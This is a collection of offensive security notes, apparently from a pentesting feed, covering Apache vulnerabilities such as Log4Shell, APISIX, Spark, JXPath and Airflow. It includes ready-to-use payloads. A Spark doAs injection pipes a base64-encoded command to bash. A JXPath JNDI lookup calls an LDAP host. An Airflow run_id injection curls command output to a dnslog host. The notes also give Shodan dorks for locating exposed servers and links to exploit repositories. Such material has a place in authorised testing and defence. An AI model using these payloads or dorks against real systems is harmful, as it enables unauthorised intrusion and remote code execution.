Apache HTTP Server 2.4.49 Path Traversal (CVE-2021-41773)

https://twitter.com/ducnt_/status/1445386557574324234

#cve #apache

Log4j RCE — CVE-2021-44228

The vulnerability allows for unauthenticated remote code execution. Log4j 2 is an open source Java logging library developed by the Apache Foundation. Log4j 2 is widely used in many applications and is present, as a dependency, in many services. These include enterprise applications as well as numerous cloud services.

# https://www.lunasec.io/docs/blog/log4j-zero-day/
# https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6
# https://github.com/whwlsfb/Log4j2Scan
# https://github.com/Cybereason/Logout4Shell

#apache #log4j #cve #rce

Apache APISIX Dashboard — Unauthorized RCE (CVE-2021-45232)

Attackers can access certain interfaces without logging in to Apache APISIX Dashboard, thus making unauthorized changes or obtaining relevant configuration information such as Apache APISIX Route, Upstream, Service, etc., and cause problems such as SSRF, malicious traffic proxies built by attackers, and arbitrary code execution.

Shodan Dorks:

title:"Apache APISIX Dashboard"

PoC:

curl https://IP:9000/apisix/admin/migrate/export

https://apisix.apache.org/blog/2021/12/28/dashboard-cve-2021-45232/

#apache #apisix #cve #poc

💉 Apache Spark RCE (CVE-2022-33891)

Apache Spark could allow an attacker to execute arbitrary commands on the system, caused by improper input validation of code path in HttpSecurityFilter when ACSs are enabled. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.

PoC (Sleep 10):
https://localhost:8080/?doAs=`echo%20%22c2xlZXAgMTAK%22%20|%20base64%20-d%20|%20bash`

Exploits:
https://github.com/HuskyHacks/cve-2022-33891
https://github.com/W01fh4cker/cve-2022-33891
https://github.com/west-wind/CVE-2022-33891

Shodan Dorks:
http.favicon.hash:856048515

#apache #spark #rce #cve

⚙️ Apache Commons Jxpath (CVE-2022-41852)

This vulnerability affects Java library called Apache Commons JXPath, which is used for processing XPath syntax. All versions (including latest version) are affected by this vulnerability. If your application uses JXPath library, you might be vulnerable. According to CVE information, all methods for XPath processing are vulnerable, except for except compile() and compilePath(). If user can provide value for the XPath expression, it might allow him to execute code on your application server.

Payload:
jxPathContext.getValue("javax.naming.InitialContext.doLookup(\"ldap://check.dnslog.cn/obj\")");

PoC:
https://github.com/Warxim/CVE-2022-41852

Research:
https://hackinglab.cz/en/blog/remote-code-execution-in-jxpath-library-cve-2022-41852/

#apache #commons #jxpath #cve #exploit

💨 Apache Airflow RCE

Tracked as CVE-2022-40127, the flaw affects Apache Airflow versions prior to 2.4.0. Apache Airflow could allow a remote attacker to execute arbitrary commands via the manually provided run_id parameter, which exists in Example Dags of Apache Airflow. By sending a specially crafted request, an attacker could exploit the CVE-2022-40127 flaw to execute arbitrary commands.

PoC:
1. Active example_bash_operator at DAGs
2. Run ID parameter
{"test":"\";curl `id -u`.xxx.dnslog.cn;\""}

#apache #airflow #dags #rce